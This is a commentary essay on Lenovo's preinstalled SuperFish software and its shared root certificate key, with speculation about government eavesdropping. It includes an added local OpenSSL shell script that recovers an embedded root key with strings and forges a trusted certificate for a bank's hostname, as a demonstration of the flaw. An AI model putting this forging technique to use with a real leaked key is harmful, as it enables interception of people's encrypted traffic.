Robert Graham recently uncovered software that came preinstalled on Lenovo computers hiding under the guise of advertising software. While the media rushes to understand the technical details, many are making the mistake of chalking it up to some poorly designed advertising / malvertising software with vulnerabilities. This is not the case at all, and it’s important to note that what Lenovo and SuperFish have done here is, by all accounts, far more serious: an intentionally designed eavesdropping / surveillance mechanism that allows the encrypted traffic of Lenovo PCs to be wiretapped by anyone positioned anywhere along its path across the Internet. We’ll never know the true motives behind the software, but someone went to great lengths to subvert the PC’s trust in encrypted connections in a way that enables this electronic wiretapping, then bundled it with new Lenovo computers.
What Graham’s notes describe, and what the media is reporting, is commonly referred to as a Man-in-the-Middle attack, run on the victim’s own computer; this is only where the trouble begins. When the user goes to establish an encrypted connection with, say, Bank of America, the SuperFish software pretends that it is Bank of America right on your computer: it generates a phony certificate in the bank’s name, signs it with a SuperFish root certificate it has planted in the PC’s trust store, and hands it to the browser, which accepts it without complaint. SuperFish then opens its own connection to the real Bank of America, so everything the browser sends and receives passes through SuperFish in the clear. Where this becomes dangerous is that the browser has now been taught to trust anything signed by SuperFish’s root, and the private key behind that root is not unique to your machine.
The threat here goes far beyond that of just the victim’s computer or advertisements: by design, this allows for wiretapping of the PC’s traffic from anywhere it travels on the Internet. In addition to the local MITM / advertising concerns the media is focusing on, the way SuperFish designed its software allows anyone who has either licensed or stolen SuperFish’s root private key to impersonate any encrypted site to any affected Lenovo PC, from any point on the network path, and read that traffic without ever having access to the computer. How is this possible? Because SuperFish appears to use the same root certificate and private key on every reported installation of the software, according to what Graham has observed so far.
Free for All
This is a very significant point: anyone who has access to SuperFish’s private key can stand between a SuperFish-bundled Lenovo PC and any encrypted site, present a certificate the PC will trust, and read the traffic. They can do this without access to the computer, because the key appears to be the same on every machine. Note what the key does not do: it does not unlock traffic that was merely recorded, since each TLS session is protected by its own fresh session key, so the attacker has to be on the path and intercept live. For anyone operating a national firewall, a backbone tap, or a coffee-shop access point, that is no obstacle at all. Now consider the possible groups that would potentially steal or license this static key from SuperFish:
The Chinese Government
We are all well aware of the Great Firewall of China, Chinese censorship of thought and content, as well as Chinese attempts to hack the United States and foreign dignitaries. The Chinese government certainly would have a vested interest in seeing underneath SSL traffic traversing their networks, either for wiretapping purposes or even for active filtering of content.
When Lenovo first purchased IBM’s ThinkPad series many moons ago, there was great concern about outsourcing such a widely used notebook to China. The Chinese government owned (and appears to still own) roughly a third of the company indirectly through Legend Holdings. Even back then, our suspicions of eavesdropping by the Chinese were significant, but that didn’t seem to get in the way of sales. This was back in the day when classified information was only allowed to be stored on devices manufactured in the United States, long before politicians and generals were wooed by Apple’s fashionable toys. In today’s climate, however, we seem to find classified data on pretty much any device, making our government officials (as well as CEOs, InfoSec researchers, and others) prime targets for Chinese espionage.
The US Government
Of course, we all love to hate on NSA and their massive dragnet surveillance program. While NSA has proven to be much smarter than a crappy piece of spyware, our government tends to think in terms of an arsenal rather than any single weapon, and a tool like SuperFish would certainly be of interest to them. While licensing the private keys could be a possibility, it is more likely that, if NSA had this on their radar, they found it and reverse engineered it themselves to extract the private key.
By reverse engineering and extracting the private key, something Graham was able to do with the trivial strings utility, the US Government (or others in the Five Eyes alliance) could use the interception points they already have on Internet backbones to impersonate any site to any SuperFish-bundled Lenovo PC and read its traffic as it passes. The key does not retroactively unlock traffic that was only recorded; it has to be used live, on the path, which is exactly the position a backbone tap provides.
Thanks to SuperFish’s seemingly intentional design in using a static private key to hijack all of your encrypted traffic, any hacker with a little know-how (or anyone who visits Rob Graham’s site) can easily swipe the private key used by SuperFish and have a little fun of their own intercepting and reading your encrypted data at hotels, coffee shops, or other public places, where getting between your laptop and the Internet is as simple as running a rogue access point.
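The chain of events described above (one root key shipped on every PC, recovered with `strings`, then used to impersonate a bank to an affected machine) can be reproduced end to end with nothing but OpenSSL. The script below is an added example written for this page; it is not code from the original post and not SuperFish’s or Lenovo’s software. The certificate names, the hostname, and the binary blob the key is “shipped” in are all constructed for the demonstration. It also shows the boundary of the exposure: the same forged certificate is rejected by a machine that does not carry the shipped root, so the population at risk is exactly the set of PCs with that root in their trust store.

```shell
#!/bin/sh
# Added example (not from the original post, not SuperFish/Lenovo code).
# Models three steps with made-up names:
#   1. a vendor generates ONE root CA and ships the same private key on every
#      PC (here: embedded in a constructed blob, "shipped.bin");
#   2. a third party recovers that key with `strings`;
#   3. with the key, they mint a certificate for any hostname that an affected
#      PC (one trusting the shipped root) accepts and a clean PC rejects.
set -eu

WORK="$(mktemp -d)"
trap 'rm -rf "$WORK"' EXIT
ROOT_CERT="$WORK/root.pem"     # what gets installed into the PC's trust store
SHIPPED="$WORK/shipped.bin"    # constructed stand-in for the installer binary

# Step 1: vendor side. The CA is static; it is generated once, never per machine.
make_static_root() {
  openssl req -new -newkey rsa:2048 -nodes -sha256 \
    -subj "/CN=Example Static Root/O=Example Adware Inc" \
    -keyout "$WORK/root.key" -out "$WORK/root.csr" 2>/dev/null
  printf 'basicConstraints=critical,CA:TRUE\nkeyUsage=critical,keyCertSign,cRLSign\n' \
    > "$WORK/root.ext"
  openssl x509 -req -in "$WORK/root.csr" -signkey "$WORK/root.key" -days 365 \
    -sha256 -extfile "$WORK/root.ext" -out "$ROOT_CERT" 2>/dev/null
  # "Ship" the key inside an opaque blob, padded with random bytes on both sides.
  { head -c 4096 /dev/urandom; printf '\n'; cat "$WORK/root.key"
    head -c 4096 /dev/urandom; } > "$SHIPPED"
}

# Step 2: attacker side. Pull the PEM back out of the blob with `strings`
# (tr(1) fallback if binutils is absent); the PEM markers delimit the key.
extract_key_from_blob() {
  if command -v strings >/dev/null 2>&1; then
    strings -n 1 "$1"
  else
    tr -c '[:print:]' '\n' < "$1"
  fi | sed -n '/-----BEGIN .*PRIVATE KEY-----/,/-----END .*PRIVATE KEY-----/p' \
    > "$WORK/stolen.key"
}

# Prints "match" when the recovered key is the one behind the shipped root.
stolen_key_matches_root() {
  if [ "$(openssl pkey -in "$WORK/stolen.key" -pubout 2>/dev/null)" = \
       "$(openssl x509 -in "$ROOT_CERT" -pubkey -noout 2>/dev/null)" ]; then
    echo match
  else
    echo mismatch
  fi
}

# Step 3: mint a leaf for an arbitrary hostname, signed with the stolen root key.
forge_leaf() {
  host="$1"
  openssl req -new -newkey rsa:2048 -nodes -sha256 -subj "/CN=$host" \
    -keyout "$WORK/$host.key" -out "$WORK/$host.csr" 2>/dev/null
  printf 'subjectAltName=DNS:%s\nbasicConstraints=CA:FALSE\n' "$host" > "$WORK/$host.ext"
  openssl x509 -req -in "$WORK/$host.csr" -CA "$ROOT_CERT" -CAkey "$WORK/stolen.key" \
    -CAcreateserial -days 30 -sha256 -extfile "$WORK/$host.ext" \
    -out "$WORK/$host.pem" 2>/dev/null
}

# Prints "accepted" or "rejected" for the forged leaf as judged by a machine
# whose trust store is $1 ("none" = a clean PC without the shipped root).
verify_as() {
  if [ "$1" = none ]; then
    trust="-no-CAfile -no-CApath"
  else
    trust="-CAfile $1"
  fi
  if openssl verify $trust -verify_hostname "$2" "$WORK/$2.pem" >/dev/null 2>&1; then
    echo accepted
  else
    echo rejected
  fi
}

main() {
  make_static_root
  extract_key_from_blob "$SHIPPED"
  echo "key recovered with strings:        $(stolen_key_matches_root)"
  forge_leaf www.bankofamerica.com
  echo "affected PC (trusts shipped root): $(verify_as "$ROOT_CERT" www.bankofamerica.com)"
  echo "clean PC (no such root):           $(verify_as none www.bankofamerica.com)"
}

main
```

Run it with `sh` on any machine with OpenSSL 1.1.1 or later (needed for `-verify_hostname`, `-no-CAfile` and `-no-CApath`); `strings` comes from binutils and the script falls back to tr(1) without it. Nothing touches the network: the “bank” exists only as a filename, and the point is that the affected machine accepts a certificate for that name from someone who never held the bank’s key, only the vendor’s.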
Forgery is Not an Accident
We’ll likely never know whether Lenovo was complicit in this, but we know one thing: SuperFish’s digital forgery was no accident. The software was specifically designed to plant its own root certificate in the trust store of Lenovo devices and then issue certificates in the names of financial institutions, government websites, or any other organization that encrypts its traffic. The root certificate itself must be removed by hand, even after the software is uninstalled. SuperFish had to intentionally write code to commit these acts of electronic forgery. You wouldn’t call forging a check or a driver’s license sloppy; it’s an intentional criminal act.
This was not a matter of some sloppy advertising software. In my opinion, these acts are serious enough to warrant an investigation by the Department of Justice; it may very well fall under electronic wiretapping law. This should be taken very seriously. We have no idea whether or not this is being used as an encryption backdoor; however, the technical capability to do just that has been placed there, bundled with your brand new Lenovo PC.
Lenovo issued a response, and claims they’ve disabled SuperFish “server side”; rather than relieve concerns, this raises even more. First, disabling SuperFish server side has no impact on the PCs that are already running it: the SuperFish root is still trusted and the local proxy is still in place, so anyone holding the SuperFish key can still impersonate sites to those machines. The only way to prevent this is for Lenovo to distribute a removal tool that uninstalls SuperFish and removes the root certificate from the trust store. Secondly, the notion that Lenovo has the power to enable or disable SuperFish server side in the first place raises some suspicions as to how closely the two are working together. If this were just some bundled software, you’d think it would be out of Lenovo’s hands to “disable” it remotely. Lenovo should be treating this as a malware infection affecting its customer base. Instead, it falsely claims the ability to disable the threat. Something smells fishy here (pun intended).
Regardless of the true motives, SuperFish is a great example of why backdoors in devices [to assist law enforcement] won’t work. By design, they weaken the security of computer systems and are susceptible to large-scale attack by anyone who knows how to use a tool as simple as ‘strings’.